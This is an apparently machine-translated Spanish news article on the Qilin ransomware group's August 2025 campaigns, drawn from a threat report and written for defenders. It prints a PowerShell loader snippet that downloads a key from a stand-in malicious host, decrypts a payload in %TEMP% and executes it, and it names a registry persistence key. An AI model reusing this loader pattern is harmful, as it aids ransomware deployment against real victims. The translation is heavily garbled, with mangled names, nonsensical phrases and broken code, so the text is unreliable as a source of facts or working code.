El panorama de amenazas de ransomware fue testigo de un cambio dramático en agosto de 2025, ya que el Grupo Qilin se atribuyó la responsabilidad de 104 ataques separados en todo el mundo.
Al emerger a principios de este año, Qilin consolidó rápidamente su posición a través de tácticas agresivas de doble extensión y una amplia estrategia de reclutamiento de afiliados.
Los compromisos iniciales han aprovechado predominantemente los servidores de protocolo de escritorio remoto expuesto (RDP) y se enfrentan públicamente a las puertas de enlace VPN, lo que permite a los afiliados establecer puntos de apoyo antes de implementar la carga útil de ransomware.
En todos los sectores, desde la fabricación hasta los servicios profesionales, Victics informó un cifrado repentino del sistema seguido de robo de datos y demandas de extorsión.
El informe del panorama de amenazas de agosto de Cyble destaca no solo el volumen de los ataques de Qilin sino también la creciente sofisticación de sus herramientas y campañas.
Sus afiliados explotan las credenciales débiles y las vulnerabilidades sin parpadear para llevar a cabo el reconocimiento inicial. Después del movimiento lateral, el grupo ejecuta un binario de cifrado a medida, diseñado para dirigir las acciones de almacenamiento unidas a la red y los servidores de archivos críticos.
La distribución global de las víctimas reclamadas de Qilin muestra el alcance del grupo en América del Norte, Europa y Asia.
Top 10 ataques sabios del país (Fuente – Cibal)
Analistas de cebol anotado Esa carga útil de Qilin emplea un cargador de varias etapas, que descifra el ejecutable de ransomware central en tiempo de ejecución utilizando una tecla AES generada dinámicamente.
Una vez descifrado, la carga útil escanea el sistema de archivos local para extensiones predefinidas, como .docx, .xlsx y .pdf, y aplica el cifrado AES-CTR.
Siguiendo el cifrado de archivo, Qilin escribe notas de rescate en cada directorio en un archivo llamado readMe_qilin.txt. Las víctimas están dirigidas a un portal de pago basado en TOR y amenazadas con fugas de datos públicos si no se recibe el pago.
En los casos en que las organizaciones ignoraron las demandas, los afiliados de Qilin comenzaron a publicar datos exfiltrados sobre sitios de filtración dentro de las 48 horas, acelerando la presión sobre los respondedores incidentes.
La rápida escalada de las operaciones de Qilin lo marca como el grupo de ransomware más prolífico en agosto, casi duplicando la actividad de su competidor más cercano, Akira.
Más allá del volumen puro, el kit de herramientas en evolución de Qilin, particularmente sus rutinas de cargador y cifrado, evita un esfuerzo concertado para evadir la detección y obstaculizar la remediación.
Mecanismo de infección y flujo de trabajo de cifrado
El mecanismo de infección de Qilin comienza con un afiliado que carga un archivo de cremallera malicioso, generalmente nombrado para imitar actualizaciones de software legítimas.
Tras la ejecución, un PowerShell One-Liner cae y lanza un lanzador binario (qlnldr.exe) en el directorio % TEMP %. El lanzador luego realiza los siguientes pasos:-
# Fragmento de cargador qilin: descifrado y ejecute nore ransomware $ enckey = (invoke-webRequest “http: // malicioso (.) Sitio/clave”) .content $ cifrypptedpayload = get-Content “$ env: temp \ qln_core.bin” -asbytreamtream $ descryado = newobject = newobject System.security.cryptography.aescryptoserviceProvider $ Decrypted. Key = (convertir) :: fromBase64String ($ enckey) $ descifrado. MODE = “CTR” $ transform = $ Decrypted.CreateDecryptor () $ corebytes = $ transform.TransformFinalBlock ($ CiCrypTedPayLoad, 0, $ CiCrypTedPayLoad.length) (System.io.file) :: WriteAlbytes (“$ ENT: TEMP \ QILIN.EXE”, $ COREBYTES) START-PROCOS “$ env: temp \ qilin.exe”
Tras la inicialización, Qilin.exe genera una clave de sesión AES única, cifra los archivos a través de unidades asignadas y exfiltra documentos confidenciales en un canal HTTPS.
La persistencia se logra registrando el cargador en la tecla HKCU \ Software \ Microsoft \ Windows \ CurrentVersion \ Ej.
Mientras que la secuencia y el mecanismo de persistencia del registro del cargador presenta la visibilidad de la cadena de infecciones de Qilin y ayudan a los defensores a la elaboración de reglas de detección específicas.
¡Encuentra esta historia interesante! Séguenos Google News, LinkedIny incógnita Para obtener más actualizaciones instantáneas.
